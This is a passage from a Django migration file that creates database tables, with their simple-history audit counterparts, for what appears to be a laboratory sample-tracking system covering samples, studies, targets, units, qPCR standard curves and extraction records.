('ext_pos_rna_rt_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('ext_pos_rna_rt_invalid', models.BooleanField(default=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='reversetranscription_creator', to=settings.AUTH_USER_MODEL)),
('extraction_batch', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='reversetranscriptions', to='liliapi.ExtractionBatch')),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='reversetranscription_modifier', to=settings.AUTH_USER_MODEL)),
('re_rt', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='reversetranscriptions', to='liliapi.ReverseTranscription')),
],
options={
'db_table': 'lili_reversetranscription',
'unique_together': {('extraction_batch', 're_rt')},
},
),
migrations.CreateModel(
name='Sample',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('study_site_name', models.CharField(blank=True, max_length=128)),
('collaborator_sample_id', models.CharField(max_length=128, unique=True)),
('sampler_name', models.CharField(blank=True, max_length=128)),
('sample_notes', models.TextField(blank=True)),
('sample_description', models.TextField(blank=True)),
('arrival_date', models.DateField(blank=True, null=True)),
('arrival_notes', models.TextField(blank=True)),
('collection_start_date', models.DateField(db_index=True)),
('collection_start_time', models.TimeField(blank=True, null=True)),
('collection_end_date', models.DateField(blank=True, null=True)),
('collection_end_time', models.TimeField(blank=True, null=True)),
('meter_reading_initial', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('meter_reading_final', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('total_volume_sampled_initial', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('total_volume_or_mass_sampled', liliapi.models.NonnegativeDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('sample_volume_initial', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('filter_born_on_date', models.DateField(blank=True, null=True)),
('filter_flag', models.BooleanField(default=False)),
('secondary_concentration_flag', models.BooleanField(default=False)),
('elution_notes', models.TextField(blank=True)),
('technician_initials', models.CharField(blank=True, max_length=128)),
('dissolution_volume', liliapi.models.NullableNonzeroDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('post_dilution_volume', liliapi.models.NullableNonzeroDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
],
options={
'db_table': 'lili_sample',
'ordering': ['id'],
},
),
migrations.CreateModel(
name='SampleGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('description', models.TextField(blank=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='samplegroup_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='samplegroup_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_samplegroup',
},
),
migrations.CreateModel(
name='UnitHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('symbol', models.CharField(db_index=True, max_length=128)),
('description', models.TextField(blank=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical unit',
'db_table': 'lili_unithistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='Unit',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('symbol', models.CharField(max_length=128, unique=True)),
('description', models.TextField(blank=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='unit_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='unit_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_unit',
},
),
# Audit-trail table for Target (django-simple-history): one row per change, keyed by
# history_id; FKs use db_constraint=False + DO_NOTHING so snapshots survive referent deletion.
migrations.CreateModel(
name='TargetHistory',
fields=[
# Copy of the live row's pk — plain indexed integer, NOT the primary key here.
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('code', models.CharField(db_index=True, max_length=128)),
('notes', models.TextField(blank=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
# '+'/'~'/'-' encode create/update/delete for each snapshot row.
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('nucleic_acid_type', models.ForeignKey(blank=True, db_constraint=False, default=1, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.NucleicAcidType')),
],
options={
'verbose_name': 'historical target',
'db_table': 'lili_targethistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# Live Target table: unique name/code; PROTECT FKs block deletion of referenced
# users and nucleic acid types while targets point at them.
migrations.CreateModel(
name='Target',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('code', models.CharField(max_length=128, unique=True)),
('notes', models.TextField(blank=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='target_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='target_modifier', to=settings.AUTH_USER_MODEL)),
('nucleic_acid_type', models.ForeignKey(default=1, on_delete=django.db.models.deletion.PROTECT, to='liliapi.NucleicAcidType')),
],
options={
'db_table': 'lili_target',
},
),
# Audit-trail table for Study (django-simple-history): history_id is the pk;
# unconstrained DO_NOTHING FKs keep snapshots valid after referent deletion.
migrations.CreateModel(
name='StudyHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('description', models.TextField(blank=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical study',
'db_table': 'lili_studyhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# Live Study table with unique name and PROTECTed creator/modifier users.
migrations.CreateModel(
name='Study',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('description', models.TextField(blank=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='study_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='study_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'studies',
'db_table': 'lili_study',
},
),
# Audit-trail table for Status (django-simple-history); same snapshot layout as the
# other *History tables in this migration.
migrations.CreateModel(
name='StatusHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical status',
'db_table': 'lili_statushistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# Live Status lookup table (unique name only).
migrations.CreateModel(
name='Status',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='status_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='status_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_status',
},
),
# Audit-trail table for StandardCurve: all qPCR curve metrics use the project's
# nullable non-negative decimal field (20 digits / 10 decimal places, min 0).
migrations.CreateModel(
name='StandardCurveHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('r_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('slope', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('efficiency', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pos_ctrl_cq', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pos_ctrl_cq_range', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical standard curve',
'db_table': 'lili_standardcurvehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# Live StandardCurve table: same metric columns as the history table above.
migrations.CreateModel(
name='StandardCurve',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('r_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('slope', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('efficiency', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pos_ctrl_cq', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pos_ctrl_cq_range', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='standardcurve_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='standardcurve_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_standardcurve',
},
),
# Audit-trail table for SampleType (django-simple-history).
migrations.CreateModel(
name='SampleTypeHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('code', models.CharField(db_index=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical sample type',
'db_table': 'lili_sampletypehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# Live SampleType lookup table: name and code are each unique.
migrations.CreateModel(
name='SampleType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('code', models.CharField(max_length=128, unique=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='sampletype_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='sampletype_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_sampletype',
},
),
# Audit-trail table for the Sample<->SampleGroup join rows.
migrations.CreateModel(
name='SampleSampleGroupHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Sample')),
('samplegroup', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.SampleGroup')),
],
options={
'verbose_name': 'historical sample sample group',
'db_table': 'lili_samplesamplegrouphistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# Live explicit M2M "through" table linking Sample and SampleGroup; CASCADE both
# ways and one row per (sample, samplegroup) pair.
migrations.CreateModel(
name='SampleSampleGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='samplesamplegroup_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='samplesamplegroup_modifier', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='liliapi.Sample')),
('samplegroup', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='liliapi.SampleGroup')),
],
options={
'db_table': 'lili_samplesamplegroup',
'unique_together': {('sample', 'samplegroup')},
},
),
# Audit-trail table for Sample: mirrors every Sample column (collection, filtration,
# concentration and volume data) plus the simple-history bookkeeping fields.
migrations.CreateModel(
name='SampleHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('study_site_name', models.CharField(blank=True, max_length=128)),
('collaborator_sample_id', models.CharField(db_index=True, max_length=128)),
('sampler_name', models.CharField(blank=True, max_length=128)),
('sample_notes', models.TextField(blank=True)),
('sample_description', models.TextField(blank=True)),
('arrival_date', models.DateField(blank=True, null=True)),
('arrival_notes', models.TextField(blank=True)),
('collection_start_date', models.DateField(db_index=True)),
('collection_start_time', models.TimeField(blank=True, null=True)),
('collection_end_date', models.DateField(blank=True, null=True)),
('collection_end_time', models.TimeField(blank=True, null=True)),
# Volume/meter metrics: non-negative decimals; the *NonzeroDecimal* fields below
# use a tiny positive minimum (1E-10) so zero is rejected.
('meter_reading_initial', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('meter_reading_final', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('total_volume_sampled_initial', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('total_volume_or_mass_sampled', liliapi.models.NonnegativeDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('sample_volume_initial', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('filter_born_on_date', models.DateField(blank=True, null=True)),
('filter_flag', models.BooleanField(default=False)),
('secondary_concentration_flag', models.BooleanField(default=False)),
('elution_notes', models.TextField(blank=True)),
('technician_initials', models.CharField(blank=True, max_length=128)),
('dissolution_volume', liliapi.models.NullableNonzeroDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('post_dilution_volume', liliapi.models.NullableNonzeroDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('filter_type', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.FilterType')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('matrix', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Matrix')),
('meter_reading_unit', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Unit')),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
# Self-referential snapshot FK to another Sample (presumably the PEG negative
# control sample — TODO confirm against the Sample model).
('peg_neg', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Sample')),
('record_type', models.ForeignKey(blank=True, db_constraint=False, default=1, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.RecordType')),
('sample_type', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.SampleType')),
('study', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Study')),
('total_volume_sampled_unit_initial', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Unit')),
],
options={
'verbose_name': 'historical sample',
'db_table': 'lili_samplehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# Audit-trail table for SampleGroup (django-simple-history).
migrations.CreateModel(
name='SampleGroupHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('description', models.TextField(blank=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical sample group',
'db_table': 'lili_samplegrouphistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# Audit-trail table for SampleExtraction join rows (sample x extraction batch,
# with separate DNA/RNA inhibition references).
migrations.CreateModel(
name='SampleExtractionHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('extraction_batch', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.ExtractionBatch')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('inhibition_dna', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Inhibition')),
('inhibition_rna', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Inhibition')),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Sample')),
],
options={
'verbose_name': 'historical sample extraction',
'db_table': 'lili_sampleextractionhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# Live SampleExtraction table: one row per (sample, extraction_batch); deleting a
# sample, batch, or inhibition cascades into these rows.
migrations.CreateModel(
name='SampleExtraction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='sampleextraction_creator', to=settings.AUTH_USER_MODEL)),
('extraction_batch', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sampleextractions', to='liliapi.ExtractionBatch')),
('inhibition_dna', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='sampleextractionsdna', to='liliapi.Inhibition')),
('inhibition_rna', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='sampleextractionsrna', to='liliapi.Inhibition')),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='sampleextraction_modifier', to=settings.AUTH_USER_MODEL)),
